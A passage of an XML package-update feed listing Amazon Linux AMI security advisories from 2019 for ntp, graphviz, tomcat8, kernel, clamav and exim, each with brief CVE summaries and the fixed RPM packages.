arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.114-83.126.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1206</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1206: medium priority package update for ntp</title><issued date="2019-05-16 22:30:00" /><updated date="2019-05-20 19:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-8936:
NTP through 4.2.8p12 has a NULL Pointer Dereference.
1686605:
CVE-2019-8936 ntp: Crafted null dereference attack in authenticated mode 6 packet
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936" title="" id="CVE-2019-8936" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-doc" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.8p12-1.41.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.8p12-1.41.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.8p12-1.41.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.8p12-1.41.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.8p12-1.41.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.8p12-1.41.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.8p12-1.41.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.8p12-1.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1207</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1207: low priority package update for graphviz</title><issued date="2019-05-16 22:32:00" /><updated date="2019-05-20 18:59:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11023:
The agroot() function in cgraph\obj.c in libcgraph.a in Graphviz 2.39.20160612.1140 has a NULL pointer dereference, as demonstrated by graphml2gv.
1699848:
CVE-2019-11023 graphviz: null pointer dereference in function agroot() in cgraph\obj.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11023" title="" id="CVE-2019-11023" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-lua" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-python27" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python27-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-java-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-python26" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python26-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-python26" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python26-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-python27" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python27-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.38.0-18.51.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.38.0-18.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1208</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1208: important priority package update for tomcat8</title><issued date="2019-05-16 23:11:00" /><updated date="2019-05-20 18:59:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0199:
The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API&#039;s blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.
1693325:
CVE-2019-0199 tomcat: Apache Tomcat HTTP/2 DoS
CVE-2018-11784:
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to &#039;/foo/&#039; when the user requested &#039;/foo&#039;) a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.
1636512:
CVE-2018-11784 tomcat: Open redirect in default servlet
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11784" title="" id="CVE-2018-11784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0199" title="" id="CVE-2019-0199" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.40-1.79.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.40" release="1.79.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.40-1.79.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1212</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1212: important priority package update for kernel</title><issued date="2019-05-20 23:27:00" /><updated date="2019-05-20 23:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11815:
A flaw was found in the Linux kernel&#039;s implementation of RDS over TCP. A system that has the rds_tcp kernel module loaded (either through autoload via local process running listen(), or manual loading) could possibly cause a use after free (UAF) in which an attacker who is able to manipulate socket state while a network namespace is being torn down. This can lead to possible memory corruption and privilege escalation.
1708518:
CVE-2019-11815 kernel: race condition in rds_tcp_kill_sock in net/rds/tcp.c leading to use-after-free
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11815" title="" id="CVE-2019-11815" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.114-83.126.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1213</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1213: important priority package update for clamav</title><issued date="2019-05-16 23:16:00" /><updated date="2019-05-20 19:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1789:
CVE-2019-1788:
CVE-2019-1787:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1787" title="" id="CVE-2019-1787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1788" title="" id="CVE-2019-1788" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1789" title="" id="CVE-2019-1789" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-lib" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.101.2" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.101.2-1.38.amzn1.noarch.rpm</filename></package><package name="clamav-filesystem" version="0.101.2" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.101.2-1.38.amzn1.noarch.rpm</filename></package><package name="clamav" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.101.2" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.101.2-1.38.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamd" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.101.2-1.38.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.101.2" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.101.2-1.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1214</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1214: important priority package update for kernel</title><issued date="2019-05-29 19:35:00" /><updated date="2019-05-30 20:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9500:
If the Wake-up on Wireless LAN functionality is configured in the brcmfmac driver, which only works with Broadcom FullMAC chipsets, a malicious event frame can be constructed to trigger a heap buffer overflow in the brcmf_wowl_nd_results() function. This vulnerability can be exploited by compromised chipsets to compromise the host, or when used in combination with another brcmfmac driver flaw (CVE-2019-9503), can be used remotely. This can result in a remote denial of service (DoS). Due to the nature of the flaw, a remote privilege escalation cannot be fully ruled out.
1701224:
CVE-2019-9500 kernel: brcmfmac heap buffer overflow in brcmf_wowl_nd_results
CVE-2019-5489:
A new software page cache side channel attack scenario was discovered in operating systems that implement the very common &#039;page cache&#039; caching mechanism. A malicious user/process could use &#039;in memory&#039; page-cache knowledge to infer access timings to shared memory and gain knowledge which can be used to reduce effectiveness of cryptographic strength by monitoring algorithmic behavior, infer access patterns of memory to determine code paths taken, and exfiltrate data to a blinded attacker through page-granularity access times as a side-channel.
1664110:
CVE-2019-5489 Kernel: page cache side channel attacks
CVE-2019-3882:
A flaw was found in the Linux kernel&#039;s vfio interface implementation that permits violation of the user&#039;s locked memory limit. If a device is bound to a vfio driver, such as vfio-pci, and the local attacker is administratively granted ownership of the device, it may cause a system memory exhaustion and thus a denial of service (DoS).
1689426:
CVE-2019-3882 kernel: denial of service vector through vfio DMA mappings
CVE-2019-11884:
The do_hidp_sock_ioctl function in net/bluetooth/hidp/sock.c in the Linux kernel before 5.0.15 allows a local user to obtain potentially sensitive information from kernel stack memory via a HIDPCONNADD command, because a name field may not end with a &#039;\0&#039; character.
1709837:
CVE-2019-11884 kernel: sensitive information disclosure from kernel stack memory via HIDPCONNADD command
CVE-2019-10142:
A flaw was found in the Linux kernel&#039;s freescale hypervisor manager implementation. A parameter passed via to an ioctl was incorrectly validated and used in size calculations for the page size calculation. An attacker can use this flaw to crash the system or corrupt memory or, possibly, create other adverse security affects.
1711194:
CVE-2019-10142 kernel: integer overflow in ioctl handling of fsl hypervisor
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10142" title="" id="CVE-2019-10142" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11884" title="" id="CVE-2019-11884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3882" title="" id="CVE-2019-3882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5489" title="" id="CVE-2019-5489" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9500" title="" id="CVE-2019-9500" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.121" release="85.96.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.121-85.96.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.121-85.96.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.121" release="85.96.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.121-85.96.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1221</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1221: critical priority package update for exim</title><issued date="2019-06-05 17:12:00" /><updated date="2019-06-05 23:22:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-10149:
A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.
1715237:
CVE-2019-10149 exim: Remote command execution in deliver_message() function in /src/deliver.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149" title="" id="CVE-2019-10149" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-debuginfo" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.91" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.91-1.20.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.91" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.91-1.20.amzn1.i686.rpm</filename></package><package name="exim-mysql" 